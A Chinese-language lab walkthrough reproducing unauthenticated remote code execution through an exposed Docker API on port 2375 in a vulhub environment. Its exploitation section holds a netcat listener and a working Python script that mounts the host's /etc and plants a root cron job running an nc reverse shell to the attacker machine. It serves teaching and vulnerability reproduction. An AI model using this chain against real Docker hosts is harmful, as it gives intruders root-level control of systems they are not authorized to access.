0x01 漏洞简介
该未授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker。
0x02 环境准备
- 靶机环境:192.168.126.130 (ubuntu)
- 攻击环境:192.168.126.128 (kali)
在靶机上使用vulhub复现漏洞环境。
- vulhub官网地址:https://vulhub.org
cd /vulhub/docker/unauthorized-rce
docker-compose build
docker-compose up -d
0x03 漏洞检测
直接输入地址 http://your-ip:2375/version ;若能访问,证明存在未授权访问漏洞。
0x04 漏洞利用
在kali上安装docker环境
apt-get install docker docker-compose
service docker start在kali上开启nc监听本地1111端口,用来接收反弹的Shell
nc -l -p 1111
使用Docker随意启动一个容器,并将宿主机的 /etc 目录挂载到容器中,便可以任意读写文件了。可以将命令写入 crontab 配置文件,进行反弹shell。
import docker
client = docker.DockerClient(base_url='http://192.168.126.130:2375/')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc 192.168.126.128 1111 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})然后执行 python 脚本反弹Shell给Kali主机的1111端口。
python docker-hack.py如果kali上运行脚本报错:No module named ssl_match_hostname,可以查看这篇文章解决
执行完脚本,耐心等待一会才会反弹shell到kali主机,大约一分多钟时间。
